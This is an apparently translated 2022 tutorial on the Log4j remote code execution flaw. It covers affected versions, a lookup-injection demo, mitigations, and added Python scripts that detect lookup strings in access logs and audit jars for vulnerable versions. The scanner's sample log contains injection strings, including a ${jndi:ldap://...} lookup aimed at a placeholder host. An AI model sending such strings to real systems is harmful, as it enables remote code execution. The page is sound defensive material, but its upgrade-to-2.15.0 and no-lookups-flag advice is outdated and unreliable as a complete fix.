Log4j vulnerability fixes and interim remedies

Time: 2022-1-13

1.2 Vulnerability rating and affected versions

Rating: the Apache Log4j remote code execution vulnerability is rated serious.

Affected version range: Apache Log4j 2.0.x <= 2.14.1 (every 2.x release up to and including 2.14.1)

2. Simple demonstration of the log4j2 vulnerability

Create a Maven project

Add the jar package dependencies

    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>
    </dependencies>

Write the log4j2 configuration file

<?xml version="1.0" encoding="UTF-8"?>

Create the test class Log4j2Demo


Run output

[INFO] Building log4j2-bug-test 1.0-SNAPSHOT
[INFO] --------------------------------[ jar ]---------------------------------
[INFO] 
[INFO] --- exec-maven-plugin:3.0.0:exec (default-cli) @ log4j2-bug-test ---
2021-12-11 11:44:14,654  INFO Log4j2Demo:12 - Hello, Windows 10 10.0, architecture: amd64-64
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  1.140 s
[INFO] Finished at: 2021-12-11T11:44:14+08:00
[INFO] ------------------------------------------------------------------------

We can see that lookup injection is possible through ${}. Assuming username is the input field of the login form, an attacker can inject through that field and read back some internal system information. If an attacker injects malicious lookups through JNDI instead, the consequences are very serious.
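As an added defender-side example (not part of the original article), the following Python scans web-access log lines for ${...} lookup strings in user-controlled fields such as the request line and the User-Agent header. It percent-decodes each field first, because a browser sends "${" as "%24%7B" and a raw match would miss it. The log format, the field names and the sample lines are constructed assumptions; "example.invalid" is a reserved placeholder host.

```python
import re
from urllib.parse import unquote

# Combined-log-style line (assumed format): ip ident user [time] "request" status "user-agent"
ACCESS_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# A Log4j lookup has the shape ${prefix:body}; capture the prefix (java, jndi, ...)
# so findings can be triaged, and take the text up to the first closing brace.
LOOKUP_RE = re.compile(r"\$\{([^:}]*)[^}]*\}?")


def find_lookups(value):
    """Return [(lookup_text, prefix)] for every '${' in value after percent-decoding."""
    decoded = unquote(value)
    return [(m.group(0), m.group(1)) for m in LOOKUP_RE.finditer(decoded)]


def scan_access_log(lines):
    """Check the request line and User-Agent of each parseable line for lookup strings."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = ACCESS_LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these separately
        for field, key in (("request", "request"), ("user_agent", "ua")):
            for lookup, prefix in find_lookups(m.group(key)):
                findings.append({
                    "line": number,
                    "ip": m.group("ip"),
                    "field": field,
                    "lookup": lookup,
                    "prefix": prefix,
                })
    return findings


# Constructed sample log (not real traffic): one benign login, one ${java:os} probe
# sent percent-encoded in the username parameter, one lookup placed in the User-Agent.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [11/Dec/2021:11:44:14 +0800] "GET /login?username=alice HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [11/Dec/2021:11:44:15 +0800] "GET /login?username=%24%7Bjava%3Aos%7D HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:11:44:16 +0800] "GET /index HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print("line %(line)d %(ip)s %(field)s: %(lookup)s (prefix=%(prefix)s)" % f)
```

The prefix is kept in each finding because a ${java:...} probe and a ${jndi:...} lookup call for different responses, but both indicate that someone is testing the login field for lookup evaluation and both should be alerted on.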

3. Log4j2 quick fixes

Upgrade the log4j2 version

According to the latest official information from Apache, log4j version 2.15.0 has been published on the release page; the update is mainly to the log4j-core package, which is where the vulnerability lives. If your program uses it, upgrade as a matter of urgency.

Interim mitigations

1. Set the JVM parameter “-Dlog4j2.formatMsgNoLookups=true”

2. Set the property “log4j2.formatMsgNoLookups=true”

3. Set the system environment variable “FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS” to “true”

4. Cut off outbound network access for the affected application and prohibit it from initiating outbound connections
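To put the affected-version range from section 1.2 and the upgrade advice above into a check you can run, here is an added Python audit script (not from the article, and not a Log4j project tool). It reads the log4j-core version declared in a pom.xml and inspects deployed jars in memory for the embedded Maven pom.properties and the JndiLookup class, then flags anything in the range 2.0 to 2.14.1 that the article gives as affected. The sample pom.xml, the in-memory jars and their contents are constructed test fixtures; the two paths inside the jar are the real locations Maven and Log4j use.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Affected range as stated in the article: Log4j 2.0.x up to and including 2.14.1.
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)
# Real paths inside a Maven-built log4j-core jar: pom.properties records the
# artifact version, and JndiLookup is the class that implements ${jndi:...}.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.0' -> (2, 14, 0); missing components default to 0."""
    nums = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_affected(version):
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def log4j_core_versions_in_pom(pom_xml):
    """Return the <version> of every log4j-core dependency declared in a pom.xml."""
    root = ET.fromstring(pom_xml)
    found = []
    for node in root.iter():
        if node.tag.split("}")[-1] != "dependency":  # ignore the Maven XML namespace
            continue
        fields = {c.tag.split("}")[-1]: (c.text or "").strip() for c in node}
        if (fields.get("groupId") == "org.apache.logging.log4j"
                and fields.get("artifactId") == "log4j-core"):
            found.append(fields.get("version", "<unspecified>"))
    return found


def inspect_jar(jar_bytes):
    """Report the log4j-core version inside a jar and whether JndiLookup is present."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return {
            "version": version,
            "has_jndi_lookup": JNDI_LOOKUP_CLASS in names,
            "affected": version is not None and is_affected(version),
        }


def audit(pom_xml, jars):
    """Return one finding string per affected pom declaration or jar (jars: name -> bytes)."""
    findings = []
    for v in log4j_core_versions_in_pom(pom_xml):
        if is_affected(v):
            findings.append("pom.xml declares log4j-core %s (affected; upgrade)" % v)
    for name, data in jars.items():
        info = inspect_jar(data)
        if info["affected"]:
            findings.append("%s: log4j-core %s, JndiLookup present=%s (affected)"
                            % (name, info["version"], info["has_jndi_lookup"]))
    return findings


# Constructed pom.xml fixture mirroring the article's dependency block, with the
# default namespace a real Maven pom carries.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>demo</groupId><artifactId>log4j2-bug-test</artifactId><version>1.0-SNAPSHOT</version>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.14.0</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.0</version>
    </dependency>
  </dependencies>
</project>
"""


def build_sample_jar(version, with_jndi_lookup=True):
    """Construct a minimal in-memory stand-in for log4j-core-<version>.jar (fixture only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version)
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not real bytecode
    return buf.getvalue()


if __name__ == "__main__":
    jars = {"log4j-core-2.14.0.jar": build_sample_jar("2.14.0"),
            "log4j-core-2.15.0.jar": build_sample_jar("2.15.0")}
    for finding in audit(SAMPLE_POM, jars):
        print(finding)
```

Checking the jar as well as the pom matters because the version that actually ships can differ from the one declared: a transitive dependency or a shaded (fat) jar can carry its own copy of log4j-core, and pom.properties inside the archive is the version that the JVM really loads.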

This work is licensed under a CC agreement; reprints must credit the author and link to this article.